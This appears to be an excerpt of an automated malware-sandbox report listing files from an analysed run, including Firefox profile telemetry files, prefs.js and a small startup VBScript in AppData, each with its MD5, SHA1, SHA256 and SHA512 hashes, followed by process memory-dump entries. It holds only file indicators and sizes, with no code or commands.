• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dly1kncb.default-release\datareporting\glean\pending_pings\5749c4ec-a8ac-4f76-9e76-32ac63701966
  Filesize: 26KB
  MD5: 022fb735d201cb20481e936a00f4403b
  SHA1: 429559b2f5bd4a8d5d7188679624afc0406b964a
  SHA256: 5327b986b083a7dd03811ee1e0df3dd434a5b55773b0c99aec363cf1d699629d
  SHA512: a22248968ebfe6e36d38d9dce139f56e9bae31ce5e96bcc578dd11a05b60e81f21d7edb710e61457878d969c21ee3426b5d2e1681db256c14fd68d70267da8d7

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dly1kncb.default-release\datareporting\glean\pending_pings\77ec597a-0b75-4cfe-8b22-dc7594863c80
  Filesize: 671B
  MD5: 3ccba4590780cd032d6f09d427cc24e6
  SHA1: 970fb41d3b8bc1a5a11dc7b483ab24b1e2b0bd78
  SHA256: cbea52de2129979c936439ed621830f7c4b6ed056b72864848211054ead8e899
  SHA512: f92d643048730331bc30b5a3d928fdc8aa35c4caffda747148df28012e949641a7376c63dae4cfad465b4de3445e8b8ed31b225f9704795bb0424b7f33ee7e0d

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dly1kncb.default-release\datareporting\glean\pending_pings\8a4eda47-ed25-4100-a468-a83e365d86a7
  Filesize: 982B
  MD5: 1c8c9a5b21998bf0da463930e591ac7d
  SHA1: f2b11791b3376cfa44bfb37ea7be10622e9f11f3
  SHA256: 64ca93829ff9d6d4724680620cac3259e39b3071093f020b7938c6a8dfc61b80
  SHA512: 2628254788eb1fbfa105d7247eef850f7db1c50fa8b3c47cf86446d6139d0b77ca33f94116ed05923f11b0391eee0bceaf799472910cbe346b229d1f6f9ed142

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dly1kncb.default-release\prefs.js
  Filesize: 10KB
  MD5: 2dfeda0169b249b32d72441da0530d12
  SHA1: 67c30f261e0aa4374e5272493ca13241f4908b3e
  SHA256: 24efc63fb301616d82048732a0a775fa80955342c4e748c88e47d65ccf66cd0c
  SHA512: 755e34ecf64d074743690c41a9854d10068f161b5aee4a40b3ab8c4712bff864f492028cf1b8231309b317d238e89042e8fc04a64d0b9161b971918bb24a116e

• C:\Users\Admin\AppData\Roaming\startup_str_27.vbs
  Filesize: 114B
  MD5: 7ada6acef03b0841d026cbe9c8c8e813
  SHA1: 884d750adb94936ef37a768489526d9761482137
  SHA256: 6d1b677af45e7613f0fea645c1195cdb514adcb948df6012f306563b6cf21a20
  SHA512: d6c0333e2a092f1eaf124bfebb557d4613a377f7d692ac4e66183d62f4a77543c64af50bb5e35189324bd0c2928530de0d7bc63500e00bb0125ed100b9c9d844

• memory/2240-60-0x000002B14D110000-0x000002B14D126000-memory.dmp
  Filesize: 88KB

• memory/3056-0-0x00007FF98C233000-0x00007FF98C235000-memory.dmp
  Filesize: 8KB

• memory/3056-1-0x0000000000C70000-0x0000000000D60000-memory.dmp
  Filesize: 960KB

• memory/4816-28-0x00000239B7DE0000-0x00000239B7E18000-memory.dmp
  Filesize: 224KB

• memory/4816-27-0x00000239B7D90000-0x00000239B7D98000-memory.dmp
  Filesize: 32KB

• memory/4816-22-0x00000239B7AC0000-0x00000239B7AE2000-memory.dmp
  Filesize: 136KB